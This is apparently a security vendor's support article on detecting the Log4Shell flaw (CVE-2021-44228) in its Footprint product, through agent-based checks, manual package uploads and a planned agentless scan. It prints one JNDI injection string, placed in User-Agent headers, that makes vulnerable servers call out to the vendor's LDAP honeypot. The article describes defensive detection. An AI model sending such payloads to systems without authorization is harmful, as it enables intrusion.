Log4J is affected by a critical vulnerability: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
The following log4j-core
versions >=2.0-beta9 and <=2.14.1 are vulnerable - including all upstream products which rely on them.
We are able to support with the detection of the Log4Shell vulnerability through the following methods:
Agent-Based Technique
Footprint Agent detects all affected upstream products which have already been confirmed by their vendors as being vulnerable. At the time of this writing the list of vendors includes the following:
Apache
Apero
Amazon
Bitnami
Broadcom
Cisco
ConnectWise
Dynatrace
Elastic
F-Secure
Graylog
HCLTech
Informatica
JAMF
Metabase
Minecraft
Netapp
NSA
We keep updating this list as vendors issue new advisories and confirm vulnerable products. For a real-time list of vulnerable products, please check out our API directly: https://midgard2.codacloud.net/api/v3/search/cve-details/CVE-2021-44228
All vulnerable libraries loaded in the memory by a running app - detection based on well-known vulnerable jar file names (starting with Footprint Agent version 5.4.10)
All vulnerable libraries loaded in the memory by a running app - detection based on java bytecode class hashes and comparing them to known vulnerable hashes (used to overcome bypassing techniques based on names or re-compiled source code)
Agentless Detection (still in development, expected release date 14th of December)
The agentless detection attempts to provoke a benign exploitation by injecting a neutralized exploit payload inside the User Agent fields of the configured targets within Footprint.
You should expect your Cloud/Internal Scanners to scan your already identified webapps with this technique.
The actual payload within the User-Agent will look like this DOLAR{jndi:ldap://honey.codacloud.net:1389/961996f4-327a-48cb-824d-5a7e653b61d7}
If your webapps use vulnerable versions of Log4J please expect call-home traffic to honey.codacloud.net:1389 via LDAP - this traffic is benign, we don’t execute any code, but you’ll see the vulnerability popping up inside Footprint
Manual validation of Java EE application packages (in form of JAR/WAR/EAR) - starting with Footprint version 7.5.76
You can find this feature under Scan Surface → Java EE Security. There is no need to run it manually if you’ve got agents already installed on all your machines.
Due to the widespread and depth of the attack, we decided to open up this manual testing procedure to anybody who may need to validate an existing Java App. Simply upload the file here from anywhere. Log4Shell - Public Manual Java EE Package Testing
All these features are also included in the Trial licenses.
We are continuing to develop and improve the detections. Please revisit this page to follow our progress. If you need any more details, feel free to contact us anytime.
Comments
0 comments
Please sign in to leave a comment.